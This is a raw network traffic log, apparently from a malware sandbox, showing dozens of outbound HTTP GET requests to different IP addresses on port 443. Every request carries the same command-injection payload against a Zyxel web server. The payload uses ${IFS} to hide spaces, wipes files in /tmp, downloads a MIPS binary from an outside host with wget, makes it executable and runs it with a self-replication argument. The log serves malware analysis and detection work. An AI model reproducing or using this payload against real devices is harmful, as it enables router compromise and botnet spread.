                                                  Jan 19, 2024 18:23:01.536463976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  244192.168.2.1343440207.30.80.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536531925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  245192.168.2.136074679.250.4.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536566973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  246192.168.2.134556040.133.52.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536613941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  247192.168.2.1358242126.107.189.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536638021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  248192.168.2.134669654.216.36.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536675930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  249192.168.2.1340850166.154.119.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536761045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  250192.168.2.133960025.85.76.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536789894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  251192.168.2.133816262.240.249.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536860943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  252192.168.2.134697443.186.97.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536917925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  253192.168.2.133796482.189.240.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541194916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  254192.168.2.135970093.186.179.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541522026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  255192.168.2.1355134158.20.27.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541575909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  256192.168.2.135962697.104.217.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541641951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  257192.168.2.135237879.235.197.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541770935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  258192.168.2.1355660157.49.61.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541824102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  259192.168.2.1336482194.241.147.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541841984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  260192.168.2.1354246174.126.118.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541925907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  261192.168.2.1358328187.98.68.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.541987896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  262192.168.2.1355478218.145.204.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542073965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  263192.168.2.133676447.225.186.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542149067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  264192.168.2.1351514217.130.124.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542218924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  265192.168.2.135495673.134.190.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542265892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  266192.168.2.1355274201.255.106.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542349100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  267192.168.2.134946460.104.235.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542423010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  268192.168.2.1338996177.58.12.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542443991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  269192.168.2.134398494.25.15.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542473078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  270192.168.2.1357646137.66.185.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542553902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  271192.168.2.1347502147.81.241.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542577982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  272192.168.2.1360100203.26.134.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542604923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  273192.168.2.1341236203.49.16.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542701006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  274192.168.2.133598252.158.66.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542768955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  275192.168.2.133811631.221.48.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542850018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  276192.168.2.1340716182.151.77.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542891026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  277192.168.2.135416217.239.29.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.542936087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  278192.168.2.133566893.213.8.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543045998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  279192.168.2.133496091.231.101.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543061972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  280192.168.2.1334308155.238.106.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543143034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  281192.168.2.1343978192.147.150.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543193102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  282192.168.2.1360242211.89.128.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543266058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  283192.168.2.135704412.70.72.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543327093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  284192.168.2.1337722155.188.77.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543386936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  285192.168.2.1335418147.255.231.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543445110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  286192.168.2.1357902221.237.210.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543517113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  287192.168.2.1342008211.22.2.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543562889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  288192.168.2.135666096.31.136.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543648958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  289192.168.2.1352320199.250.105.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543713093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  290192.168.2.134143873.222.124.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543771029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  291192.168.2.133535425.9.43.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543826103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  292192.168.2.135931685.173.241.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543859005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  293192.168.2.1350782178.34.47.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543910980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  294192.168.2.1341910126.246.59.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.543976068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  295192.168.2.135913412.36.175.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544048071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  296192.168.2.1339746122.191.0.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544109106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  297192.168.2.1343310189.67.248.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544164896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  298192.168.2.134551684.74.208.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544215918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  299192.168.2.1344206195.230.158.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544282913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  300192.168.2.1358414143.159.81.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544354916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  301192.168.2.1356066154.248.128.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544415951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  302192.168.2.1334678137.116.132.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544564009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  303192.168.2.135193876.103.193.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544626951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  304192.168.2.134666096.173.47.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544656038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  305192.168.2.1358096135.201.59.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544682980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  306192.168.2.134835687.138.250.165443
                                                  TimestampBytes transferredDirectionData
